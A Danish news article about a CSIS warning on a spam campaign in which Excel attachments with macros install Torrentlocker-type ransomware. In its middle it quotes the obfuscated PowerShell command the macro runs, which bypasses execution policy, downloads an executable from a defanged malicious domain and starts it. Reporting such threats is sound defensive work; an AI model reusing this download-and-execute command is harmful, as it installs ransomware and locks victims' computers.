Danmark er mål for endnu en spamkampagne fra it-kriminelle, der bærer en ransomware i Torrentlocker-familien.
Det skriver sikkerhedsfirmaet CSIS i en sikkerhedsadvarsel.
Den ondsindede email ligner de fleste andre spam-emails for tiden med en tilsyneladende personlig besked på dansk og et tilknyttet Excel-dokument.
Hvis denne fil åbnes af en uforsigtig modtager og får en tilknyttet makrokode aktiveret ved at slå Excels beskyttelsestilstand fra, vil brugeren ende med en krypteret computer.
Du kan se et eksempel på mailen i toppen af artiklen.
Aktiveres automatisk
Makrokoden henter automatisk selve ransomware-programmet ned fra et ondsindet domæne, der via Windows' powershell-framework henter ransomware i Torrentlocker-klassen ned og afvikler programmet.
Det vil resultere i en låst computer og formodentligt et krav om en løsesum.
Funktionen ses udført via følgende powershell i en sikret form fra CSIS:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.exE -ExeCuTiONPoliCY BYpaSS -nOProfilE -WIndoWsTyle hiddeN (nEw-objeCT SySTEM.NET.WeBcLIeNt).dOWnLoadFIle('http://ltmp.applepice[.]pl/file/set.rte','C:\Users\[%brugerkonto%]\AppData\Roaming.eXE');staRT-PrOcESS 'C:\Users\[%brugerkonto%]\AppData\Roaming.EXe'
Alle bør derfor være opmærksomme, hvis de modtager en mail med et enkeltstående xls-dokument, der ikke giver mening, og særligt hvis det kommer fra en ukendt email-adresse.
Angrebet minder i høj grad som et lignende angreb fra sidste uge, hvor ransomwaren blev aktiveret af en vedhæftet zip-fil.
Det fik i sidste uge CSIS til at højne sin trusselvurdering til 4 ud af 5.
Læs også: Sikkerhedsfirma advarer: Målrettet ransomware-kampagne skyller ind over Danmark